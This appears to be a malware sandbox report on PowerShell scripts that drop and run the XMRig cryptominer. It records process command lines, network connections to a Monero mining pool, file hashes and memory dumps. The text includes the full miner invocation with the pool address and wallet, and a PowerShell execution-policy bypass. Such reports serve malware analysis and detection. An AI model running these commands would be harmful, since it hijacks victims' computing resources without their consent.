| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3320 wrote to memory of 4988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3320 wrote to memory of 4988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3320-3-0x00007FFB5F763000-0x00007FFB5F764000-memory.dmp
memory/3320-5-0x0000010AF30D0000-0x0000010AF30F2000-memory.dmp
memory/3320-8-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-10-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-9-0x0000010AF3860000-0x0000010AF38D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4iqxozo.eep.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3320-26-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-49-0x0000010AF3800000-0x0000010AF3812000-memory.dmp
memory/3320-62-0x0000010AF37E0000-0x0000010AF37EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4988-91-0x000001EFC30C0000-0x000001EFC30E0000-memory.dmp
memory/4988-92-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/3320-93-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-95-0x00007FFB5F763000-0x00007FFB5F764000-memory.dmp
memory/4988-94-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/3320-96-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-97-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/4988-98-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-99-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-100-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-101-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-102-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-103-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-104-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-105-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-106-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-107-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-108-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-109-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-110-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-111-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-112-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-113-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-114-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-115-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-116-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-117-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-118-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-119-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-120-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-121-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-122-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-123-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-124-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-125-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-126-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-127-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-128-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-129-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-130-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-131-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-132-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-133-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-134-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-135-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-136-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-137-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-138-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-139-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-140-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-141-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-142-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-143-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-144-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-145-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-146-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-147-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-148-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-149-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-150-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-151-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-152-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-153-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-154-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-155-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-156-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-157-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-158-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4192 wrote to memory of 4664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4192 wrote to memory of 4664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4192-0-0x00007FFAE60C3000-0x00007FFAE60C5000-memory.dmp
memory/4192-1-0x0000024AABAF0000-0x0000024AABB12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1atwsype.0ve.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4192-11-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4192-12-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4192-14-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4192-15-0x0000024AAC6B0000-0x0000024AAC6C2000-memory.dmp
memory/4192-16-0x0000024AABB20000-0x0000024AABB2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4664-47-0x000001B6B52E0000-0x000001B6B5300000-memory.dmp
memory/4664-48-0x000001B6B6CD0000-0x000001B6B6CF0000-memory.dmp
memory/4664-49-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4192-50-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4664-52-0x000001B6B6D10000-0x000001B6B6D30000-memory.dmp
memory/4664-51-0x000001B6B6CF0000-0x000001B6B6D10000-memory.dmp
memory/4192-54-0x00007FFAE60C3000-0x00007FFAE60C5000-memory.dmp
memory/4664-53-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-55-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4192-56-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4664-59-0x000001B6B6D10000-0x000001B6B6D30000-memory.dmp
memory/4664-58-0x000001B6B6CF0000-0x000001B6B6D10000-memory.dmp
memory/4664-57-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-60-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-61-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-62-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-63-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-64-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-65-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-66-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-67-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-68-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-69-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-70-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-71-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-72-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-73-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-74-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-75-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-76-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-77-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-78-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-79-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-80-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-81-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-82-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-83-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-84-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-85-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-86-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-87-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-88-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-89-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-90-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-91-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-92-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-93-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-94-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-95-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-96-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-97-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-98-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-99-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-100-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-101-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-102-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-103-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-104-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-105-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-106-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-107-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-108-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-109-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-110-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-111-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-112-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-113-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-114-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-115-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-116-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-117-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-118-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:02
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2196 wrote to memory of 2032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2196 wrote to memory of 2032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2196-3-0x00007FFB65DB3000-0x00007FFB65DB4000-memory.dmp
memory/2196-5-0x0000017D7F4B0000-0x0000017D7F4D2000-memory.dmp
